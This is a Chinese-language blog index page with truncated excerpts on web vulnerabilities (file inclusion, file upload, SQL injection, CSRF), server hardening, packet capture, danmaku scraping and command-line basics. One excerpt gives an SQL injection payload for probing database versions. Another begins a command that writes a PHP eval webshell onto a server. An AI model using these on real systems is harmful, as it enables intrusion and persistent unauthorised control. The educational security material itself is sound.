排序:
默认
按更新时间
按访问量

文件包含漏洞

文件包含漏洞是“代码注入” 的一种,常见的导致文件包含的函数如下: PHP:include(),include_once(),require(),require_once(),fopen(),readfile() JSP/Servlet:ava.io.File(),java.io.FileRe...

2018-09-13 17:53:28

阅读数:33

评论数:0

文件上传漏洞概述

文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力,这种攻击方式是最为直接和有效的,有时候几乎没有什么技术门槛。 文件上传后导致的常见问题一般有: 1.上传文件是Web脚本语言,服务器的Web容器解释并执行了用户上传的脚本,导致代码执行。 2.上传文...

2018-09-11 17:48:47

阅读数:32

评论数:0

数据库攻击技巧

SQL注入可以猜解出数据库的对应版本,比如下面这段Payload,如果MySQL的版本是4,则会返回true。 http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4 下面这段Payload,则是利用union sele...

2018-09-11 16:20:08

阅读数:28

评论数:0

Web框架与CSRF防御

在Web框架中可以使用Security token解决CSRF攻击的问题。 CSRF攻击的目标,一般都会产生“写数据”操作的URL,比如“增”、“删”、“改”;而“读数据”操作并不是CSRF攻击的目标,因为在CSRF的攻击过程中攻击者无法获取到服务器端返回的数据,攻击者只是借用户之手触发服务器动...

2018-09-11 15:59:46

阅读数:12

评论数:0

MVC框架安全

从数据的流入来看,用户提交的数据先后流经了View层、Controller、Model层,数据的流出则反过来。在设计安全方案时,要牢牢把握住数据这个关键因素。在MVC框架中,通过切片、过滤器等方式,往往能对数据进行全局处理,这为设计安全方案提供了极大的便利。 比如在Spring Security...

2018-09-11 15:42:28

阅读数:14

评论数:0

Nginx安全

比如CVE-2010-2266是一个Nginx的拒绝服务漏洞。 就软件安全本身来看,Nginx和Apache最大的区别在于,检查Apache安全时更多的要关注Module的安全,而Nginx则需要注意软件本身的安全,及时升级软件版本。 与Apache一样,Nginx也应该以单独的身份运行,这是...

2018-09-11 15:21:14

阅读数:15

评论数:0

Linux之在CentOS上一次艰难的木马查杀过程

原文地址:https://blog.csdn.net/xpb1980/article/details/76647355今天朋友说他一台要准备上线的生产服务器被挂马,特征ps命令找不到进程,top能看到负载最高的一个程序是一个随机的10位字母的东西,kill掉之后自动再次出现一个随机10位字母的进程...

2018-04-17 15:19:31

阅读数:111

评论数:0

Mac OS X上使用Wireshark抓包

原文地址:http://blog.csdn.net/phunxm/article/details/385905610.关于 Wireshark(1)aboutWireshark is the world’s foremost and widely-used network protocol ana...

2018-03-08 18:09:09

阅读数:63

评论数:0

抓取熊猫TV弹幕

原文地址:http://blog.csdn.net/gaopu12345/article/details/50609663前天看到了别人写的抓取斗鱼弹幕的程序,抓取斗鱼弹幕是我很早以前的一个想法,但是无奈不会写,不懂得tcp传过来的那些字节的含义,所以没写出来,当我看到别人写好的代码,我就参照人家...

2018-03-05 15:49:46

阅读数:119

评论数:0

抓取斗鱼直播弹幕

原文地址:http://blog.csdn.net/bfboys/article/details/52853041前几天看了知乎的一个问题(如何获取斗鱼直播间的弹幕信息?)之后,才有了这个想法。一直对抓取信息比较感兴趣,这次也不会错过咯,尝试一下 →.→抓取数据的基本思路就是: 抓包 → 分析请求...

2018-03-05 15:33:53

阅读数:1358

评论数:0

Chrome分析网页获取Bilibili弹幕

原文地址:http://blog.csdn.net/u011327333/article/details/78690965Chrome分析网页-一步步获取Bilibili弹幕Chrome 提供的8大工具简介Elements从浏览器的视角来看页面,也就是说我们可以看到chrome渲染页面所需要的HT...

2018-03-05 13:49:06

阅读数:103

评论数:0

如何写一只抓哔哩哔哩弹幕的爬虫

原文地址:http://blog.csdn.net/bigbigsman/article/details/78639053如何写一只抓哔哩哔哩弹幕的爬虫爬虫工作流程解析首页获得视频cid构造所有的获取弹幕链接解析xml文件并插入数据库遍历获取每一集的弹幕内容1、解析首页获取每一集的cid和内容访问...

2018-03-05 10:30:03

阅读数:163

评论数:0

Cmd和Dos的区别(汇总)

原文地址:http://blog.csdn.net/lushuaiyin/article/details/6975241你在windows操作系统里进的DOS(即输入 CMD 进命令提示符)不是纯DOS,只是为方便某些需求而建立的,而纯DOS本身就是一种操作系统.(两者的区别:比如你可以在纯DOS...

2018-02-12 13:35:51

阅读数:82

评论数:0

简单Dos 命令与linux命令的区别

原文地址:http://blog.csdn.net/caiqcong/article/details/7484744简单Dos命令与linux命令的区别:功能DosLinux复制文件copycp移动文件movemv列举文件dirls清除屏幕clsclear退出exitexit显示修改日期dated...

2018-02-12 13:26:41

阅读数:221

评论数:0

Dos命令之 arp (网络诊断与配置)使用详解

原文地址:http://blog.csdn.net/wang740209668/article/details/77622173arp命令用于显示和修改地址解析协议缓存表的内容,缓存表项是ip地址与网卡地址对,计算机上安装的每个网卡各有一个缓存表。使用不带参数的arp命令,可以得到帮助信息。arp...

2018-02-12 09:01:11

阅读数:73

评论数:0

2016年十大黑客工具

原文地址:http://blog.csdn.net/zhu123mei123rui123/article/details/50479236『自我陶醉黑客世界的朋友免不了要用到这些!』密码破解John The Ripper密码破解Aircrack-ng密码破解THC Hydra网络漏洞扫描器Burp...

2018-02-11 15:15:50

阅读数:917

评论数:0

黑客常用dos命令详解

原文地址:http://blog.csdn.net/CSDN___LYY/article/details/778024381.DIR命令作用:显示磁盘目录所包含的内容格式:DIR[文件名][选项]例如:DIR D:\JDK 查询D盘下的JDK文件夹下的未隐藏文件DIR D:\JDK /A 查询D盘...

2018-02-11 14:33:44

阅读数:91

评论数:0

Linux tcpdump命令详解

原文地址:https://www.cnblogs.com/ggjucheng/archive/2012/01/14/2322659.html简介用简单的话来定义tcpdump,就是:dump the traffic on a network,根据使用者的定义对网络上的数据包进行截获的包分析工具。 ...

2018-02-11 11:52:35

阅读数:66

评论数:0

查询局域网电脑的IP,端口号,MAC地址(黑客技术入门)

原文地址:http://blog.csdn.net/qq_21792169/article/details/51954815网上看到很多都是使用nmap工具,这个工具我没有使用过,我自己实现nmap工具的功能,首先我们查询局域网内有哪些电脑是alive的,下面我写了一个脚本:ping.sh   这...

2018-02-11 11:13:34

阅读数:115

评论数:0

黑客常用 Linux 入侵常用命令

原文地址:http://blog.csdn.net/jHstGeWWubw/article/details/78941387写个php一句话后门上去:[jobcruit@wa64-054 rankup_log]$ echo -e "<?php @eval(\...

2018-02-10 10:49:33

阅读数:3236

评论数:0

提示
确定要删除当前文章?
取消 删除
关闭
关闭